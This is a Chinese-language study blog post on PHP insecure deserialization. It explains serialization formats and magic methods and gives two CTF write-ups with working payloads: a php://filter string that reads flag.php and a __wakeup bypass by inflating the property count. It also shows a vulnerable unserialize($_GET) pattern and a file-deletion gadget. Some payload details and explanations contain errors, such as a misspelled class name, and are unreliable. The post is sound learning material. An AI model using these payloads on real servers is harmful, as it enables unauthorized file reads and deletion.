php反序列化
声明:本人只是在学习反序列化 因此这篇文章大量参考了https://blog.csdn.net/Hardworking666/article/details/122373938 这位的博客 感谢他的详细文章让我可以详细学习反序列化 大家想看更详细的可以直接参考他的文章!!!
什么是序列化和反序列化
序列化就是将数据格式转化成可以存储和传输的格式,原因是php文件正常执行结束会将文件销毁,那么下一次使用的时候就没有了,因此需要长久保存,就是序列化,也就是是使用serialize()函数.
反序列化就是将可以传输的这种格式恢复成原本的对象,使用unserialize()函数
+++
json 和 php 序列化的关系
json
- 一种轻量级的数据格式,通常用于前后端的数据传输,api,web开发,源自
jsp - 人类可读
- 一种纯文本格式,易于通过HTTP传输
关系
- json是跨平台,跨语言的 任何支持json语言的都可以读写json数据
- php序列化只能在php中使用,不嫩那个直接跨语言传输
- 二者可以互相转化,但需要手动改动
+++
php面向对象编程
- 面向对象(一种编程思路) : 将程序中的数据和操作方法打包在一起 ,包含对象 类 封装 继承等
- 对象 :程序中的
基本单位,也是现实中的一个具体事物,例如狗狗是一个对象 - 类:它是对象的
蓝图:定义了狗的特性(毛色 行为) 也可以由类产生具体对象 - 封装:将数据和方法打包载一起,只暴露必要部分,例如你知道踩油门车会动,但是不知道内部结构和工作原理
- 继承:就是一个类可以继承另一个类的特性,避免代码重复,例如毛和狗都继承了动物类型
- 多态:同一个方法在不同对象有
不同表现
- 对象 :程序中的
<?php
class Test//定义了一个类
public $variable = 'this is a variable' //定义了一个变量
pubilc function PrivateVariable() //定义了一个方法
$object = new Test(); //创建了一个对象
$object -> PrintVariable(); //创建了一个方法
?>
普及面向过程(c pascal fortran)
- 将程序看作一系列步骤或者动作的指令,可以将其当成一个菜谱,一步一步完成任务
+++
pubilc protected private
- php对属性或者方法的访问权限 是通过在前面加关键字实现的 有
- public(共有):在任何地方
都可以访问到 - privated(受保护):受保护的类成员可以被
其自身或者父类 子类访问 - private(私有):私有的类成员只能
被其定义的类所访问
- public(共有):在任何地方
注意: (\x00代表空字符 必须占一个位置)
public:属性被序列化后属性值会变为属性名
privated:属性值被序列化后属性值会变成\x00*\x00属性名
privated:属性值被序列化后属性值会变成\x00类名\x00属性名
+++
魔术方法
- 格式:
两个下划线_开头
- 函数
__construct() //类的构造函数,创建对象时触发,用于初始化对象的属性或者执行一些启动工作
__destruct() //类的析构函数,对象被销毁时触发。用来释放资源或执行清理工作
__call() //当你调用一个对象的不可访问方法时触发。比如调用一个不存在的对象方法。
__callStatic() //当你调用一个静态方法时,但方法不存在时触发。
__get() //当你访问一个不可访问的属性时触发。比如访问私有属性。
__set() //当你给一个不可访问的属性赋值时触发。
__isset() //当你调用 isset() 或 empty() 判断不可访问属性时触发。
__unset() //当你用 unset() 删除不可访问属性时触发。
__invoke() //当你试图以函数的方式调用对象时触发
__sleep() //当你将对象序列化时触发,通常用于决定哪些属性应该被序列化。
__wakeup() //当你反序列化对象时触发,用于重新初始化某些状态。
__toString() //当你将对象作为字符串输出时触发。
- 作用:他们使你能在Php中对类的行为进行精细调控,十分牛逼
从序列化到反序列化
_construct ->__sleep ->__wakeup() -> __toString ()-> __destruct()
<?php
class TestClass
{
//一个变量
public $variable = 'This is a string';
//一个方法 这个方法用于打印变量$variable 的值
public function PrintVariable()
{
echo $this->variable.'<br />';
}
//构造函数在创建函数时自动调用
public function __construct()
{ //简单输出__construct
echo '__construct<br />';
}
//析构函数在对象被摧毁时自动调用
public function __destruct()
{ //简单输出__destruct
echo '__destruct<br />';
}
//当对象被当作一个字符串,函数调用
public function __toString()
{
return '__toString<br />';
}
}
//创建一个对象
//__construct会被调用
$object = new TestClass();
//调用一个方法
//‘This is a string’将会被输出
$object->PrintVariable();
//对象被当作一个字符串
//toString会被调用
echo $object;
//php脚本要结束时,__destruct会被调用
?>
漏洞:
- 序列化只序列化属性 不序列方法
- 我们能控制的只有类的属性,攻击者就是寻找合适能被控制的属性
+++
php序列化与反序列化的使用
序列化:
<?php
class User
{
//类的数据
public $age = 0; //初始值为0
public $name = ''; //初始值为空字符
//输出数据的方法
public function printdata()
{
//输出用户的年龄和姓名
echo 'User '.$this->name.' is '.$this->age.' years old.<br />';
} // “.”表示字符串连接
}
//创建User类的对象
$usr = new User();
//设置数据
$usr->age = 18;
$usr->name = 'Hardworking666';
//调用方法输出数据
$usr->printdata();
//输出序列化后的数据
echo serialize($usr)
?>
输出结果:
User Hardworking666 is 18 years old.
O:4:"User":2:{s:3:"age";i:18;s:4:"name";s:14:"Hardworking666";}
这里的输出结果第二行就是序列化后的形式:
"o"表示对象,"4"表示对象名长度为4,"User"为对象名,“2”表示有2个参数
“{}”里面是参数的key和value
"s"表示string对象,"3"表示长度,“age”为key,"i"是interger(整数)对象,“18”是value
-
s:3:"age"表示属性名是age,长度为 3 个字符。i:18表示age属性的值是一个整数18。s:4:"name"表示属性名是name,长度为 4 个字符。s:14:"Hardworking666"表示name属性的值是一个字符串,长度为 14 个字符,内容是"Hardworking666"。
对上述例子进行反序列化:
<?php
class User
{
//类的数据
public $age = 0;
public $name = '';
//输出数据
public function printdata()
{
echo 'User '.$this->name.' is '.$this->age.' years old.<br />';
}
}
//重建对象
$usr = unserialize('O:4:"User":2:{s:3:"age";i:18;s:4:"name";s:14:"Hardworking666";}');
//输出数据
$usr->printdata();
?>
输出结果:
User Hardworking666 is 18 years old.
序列化格式:
a - array 数组型
b - boolean 布尔型
d - double 浮点型
i - integer 整数型
o - common object 共同对象
r - objec reference 对象引用
s - non-escaped binary string 非转义的二进制字符串
S - escaped binary string 转义的二进制字符串
C - custom object 自定义对象
O - class 对象
N - null 空
R - pointer reference 指针引用
U - unicode string Unicode 编码的字符串
实例代码:
这里会演示PHP中关于序列化和反序列化的一些特别行为,特别是 使用了魔术方法__sleep和__wakeup来控制序列化和反序列化过程中的行为,并且定义了__construct和__destruct来演示对象创建和销毁时的行为
<?php
class test
{
public $variable = '变量反序列化后都要销毁'; // 公共变量
public $variable2 = 'OTHER';
// 打印变量的方法
public function printvariable()
{
echo $this->variable . '<br />';
}
// 构造方法,创建对象时调用
public function __construct()
{
echo '__construct' . '<br />';
}
// 析构方法,销毁对象时调用
public function __destruct()
{
echo '__destruct' . '<br />';
}
// 在对象反序列化时调用
public function __wakeup()
{
echo '__wakeup' . '<br />';
}
// 在对象序列化时调用
public function __sleep()
{
echo '__sleep' . '<br />';
return array('variable', 'variable2'); // 只序列化这些属性
}
}
// 创建一个对象,回调用 __construct 这里直接输出construct
$object = new test(); // 输出:__construct
// 序列化一个对象,会调用 __sleep
$serialized = serialize($object); // 输出:__sleep
// 输出序列化后的字符串
print 'Serialized:' . $serialized . '<br />'; // 输出 Serialized:O:4:"test":2:{s:8:"variable";s:24:"变量反序列化后都要销毁";s:8:"variable2";s:5:"OTHER";}
// 反序列化对象,会调用 __wakeup
$object2 = unserialize($serialized); // 输出:__wakeup
// 调用 printvariable,会输出数据
$object2->printvariable(); // 输出:变量反序列化后都要销毁
// 脚本结束,会调用 __destruct
?>
输出结果:
__construct
__sleep
Serialized:O:4:"test":2:{s:8:"variable";s:24:"变量反序列化后都要销毁";s:8:"variable2";s:5:"OTHER";}
__wakeup
变量反序列化后都要销毁
__destruct
+++
php反序列化
原理:
- 目标是
服务器端 - 攻击者构造一个包含恶意数据的序列化字符串,例如一个包含特定文件路径的对象属性,或者触发恶意代码的模式方法
- 攻击者将恶意数据交给服务器(url post请求 cookie)
- 服务器在反序列时会触发魔术方法 导致恶意操作
使用:
调用__destruct删除
存在漏洞思路:一个类用于临时将日志存储进某个文件,当__destruct被调用时,日志文件就会被删除
//logdata.php
<?php
class logfile //定义了一个类叫logfile
{
//log文件名
public $filename = 'error.log';
//一些用于储存日志的代码
public function logdata($text) // ->核心方法 :将日志文本追加到error.log文件
{
echo 'log data:'.$text.'<br />';
file_put_contents($this->filename,$text,FILE_APPEND);
}
//destrcuctor 删除日志文件
public function __destruct()
{
echo '__destruct deletes '.$this->filename.'file.<br />';
unlink(dirname(__FILE__).'/'.$this->filename);
}
}
?>
下一段代码和上一段属于不同的两个类 但是上一段可以引入下一段用于存储下一段中的数据(日志)
<?php
include 'logdata.php'
class User
{
//类数据
public $age = 0;
public $name = '';
//输出数据
public function printdata()
{
echo 'User '.$this->name.' is'.$this->age.' years old.<br />';
}
}
//重建数据
$usr = unserialize($_GET['usr_serialized']);
?>
这里通过get传参 或者 url ,用户传入yourscript.php?usr_serialized=O:4:"User":2:{s:3:"age";i:25;s:4:"name";s:5:"Alice";}的序列化字符串给服务器 ,之后服务器会反序列化成$usr = unserialize($_GET['usr_serialized']); 这样你就可以使用**$usr**作为user类的实例 ,并访问他的属性以及调用方法了
像这样:
echo $usr->name; //输出用户的名字
echo $usr->age; //输出用户年龄
$usr->printdata //调用printdata方法
或者构造删除目录下的index.php文件
<?php
include 'logadata.php';
$object = new logfile();
$object ->filename='index.php';
echo serialize($object).</br>;
?>
+++
实战
BUU CODE REVIEW 1 [网鼎杯 2020 青龙组]AreUSerialz 目标:读取flag
页面源代码
<?php
include("flag.php"); //将指定的php文件flag内容嵌入到当前脚本中
highlight_file(__FILE__);
class FileHandler { //filehandler类包含了一些属性 如$op $fileneme $content 这些属性的值将影响对象的方法执行
protected $op;
protected $filename;
protected $content;
function __construct() { //这里初始化一些值
$op = "1";
$filename = "/tmp/tmpfile";
$content = "Hello World!";
$this->process();
}
public function process() { //process方法根据$op的值调用weite或者read方法
if($this->op == "1") {
$this->write();
} else if($this->op == "2") {
$res = $this->read();
$this->output($res);
} else {
$this->output("Bad Hacker!");
}
}
private function write() {
if(isset($this->filename) && isset($this->content)) { //用于检查当前对象的属性是否被初始化
if(strlen((string)$this->content) > 100) {
$this->output("Too long!");
die();
}
$res = file_put_contents($this->filename, $this->content); //file put content将字符串写入文件中 这里和我们想要读取flag没有关系
if($res) $this->output("Successful!");
else $this->output("Failed!");
} else {
$this->output("Failed!");
}
}
private function read() {
$res = "";
if(isset($this->filename)) {
$res = file_get_contents($this->filename);
}
return $res;
}
private function output($s) {
echo "[Result]: <br>";
echo $s;
}
function __destruct() { // 文件最终都会销毁 看看后面的内容
if($this->op === "2")
$this->op = "1"; //强行让op=1 所以我们要绕过他
$this->content = "";
$this->process();
}
}
function is_valid($s) { //用于检验$str字符串是否仅包含ascii字符串中32到125位的
for($i = 0; $i < strlen($s); $i++)
if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
return false;
return true;
}
if(isset($_GET{'str'})) { //通过get传参方法获取字符串str
$str = (string)$_GET['str'];
if(is_valid($str)) {
$obj = unserialize($str);
}
}
解法:
这里我通过在线运行php程序
<?php
class FileHandler
{
public $op=2;
public $filename="php://filter/read=convert.base64-encode/resource=flag.php"; //这个代码的作用是 读取 flag.php 文件 的内容,并将其 Base64 编码。(下方芝士中有拓展)
public $content; //这里属性都定义为公共的,因为序列化时私有的属性就会被忽略 这就无法达成我想要的目的
}
$a = new FileHandler(); //这里创建一个filehandler类的实例 实例化后 才可以使用类的属性或者方法
echo serialize($a); //这里用于将a这个对象(也就是filehandler类的实例)转化为一个可以存储或传输的字符串
?>
输出
O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";N;}
之后payload:
?str=O:12:"FileHhandler":3:{s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";N;}
得到了result //这是base64的编码 这里使用[file:///D:/cyberchef/CyberChef_v10.19.4.html][] 进行解码
[Result]:
PD9waHAgJGZsYWc9J2ZsYWd7YjI1NjVlNTgtOWFkOS00MGE2LTg5ZmItMDQ1MWFkNzUwYjk5fSc7Cg==
<?php $flag='flag{b2565e58-9ad9-40a6-89fb-0451ad750b99}';
因此得到flag
芝士点: php 封装协议
php://协议PHP 中的
php://协议是一个特殊的流包装器,可以让你访问文件系统、内存或其他资源,进行编码或解码等操作,常用的协议包括:
php://input: 读取原始 POST 数据流(例如上传文件)。php://output: 将输出直接发送到浏览器。php://memory: 在内存中读写数据,类似文件,但不存储在磁盘上。php://filter: 用于对文件流进行过滤,可以对文件内容进行编码、解码等操作。
resource=<要过滤的数据流> 指定了你要过滤的数据流 必选
read=<读链的筛选列表> 可以指定一个或者多个过滤器的名称 以管道符(|)分割 可选
write=<写链的筛选列表>可以设定一个或多个过滤器名称,以管道符(|)分割,可选
经验:php伪协议
因此上面的题目中 我们将flag.php文件在读取时进行base64编码 ,这样即使我们能够访问文件内容,他也不会以纯文本形式直接显示 ,这么做是为了绕过一些限制并且获取文件内容,因为出题者增加了题目难度
+++
[极客大挑战 2019]PHP
做法
这里启动靶机之后显示有备份网站 这里使用dirsearch
dirsearch是一个用 Python 编写的简单而强大的目录扫描工具,它用于通过暴力攻击来发现 Web 服务器上的隐藏目录和文件
python dirsearch.py -u http://ce68feba-62cb-4570-8482-1904ddc69956.node5.buuoj.cn:81/ -e php
查看class.php的文件中发现问题在于我需要让username=admin,但是设置的代码 使得反序列之后uesename=guest 所以关键在于绕过__wakeup 魔术方法
解法:
- 当属性个数的值大于实际个数的时候,会跳过__wakeup()函数的执行
ps:
O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}
// 这里name 后面属性值应该是2 但是我之后改成了3 那么就可以绕过__wakeup了
O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}
这里的序列化的代码来自以下代码 也就是本题目解法
<?php
class Name {
private $username = 'admin';
private $password = '100';
}
// 创建对象
$a = new Name();
// 序列化对象
echo serialize($a);
?>
但是光光修改了属性值为3不足以通过题目 因为private 属性被序列化的时候属性名字会变成%00类名%00属性名 ,长度跟随属性名长度而改变,加%00的目的是用于替代不可见字符
这里在线编码没有加的原因可能是
PHP 版本差异:不同版本的 PHP 可能会在处理私有和受保护属性时有所不同。早期的 PHP 版本会使用
\0字节(即%00)来区分私有和受保护属性,而某些较新的 PHP 版本可能会改变这一行为,直接使用属性名。运行环境影响:你提到是在“在线运行环境”中运行代码,这可能会影响到序列化的具体实现。有些在线工具可能会修改或简化序列化逻辑,以便输出更易读或更简洁的结果。
序列化机制的优化:为了优化序列化的效率,PHP 可能对某些特殊情况做了处理。例如,如果对象的类定义是简单的,PHP 可能不会添加
\0字节,而是直接使用属性名。
因此
O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}
得到了flag!!!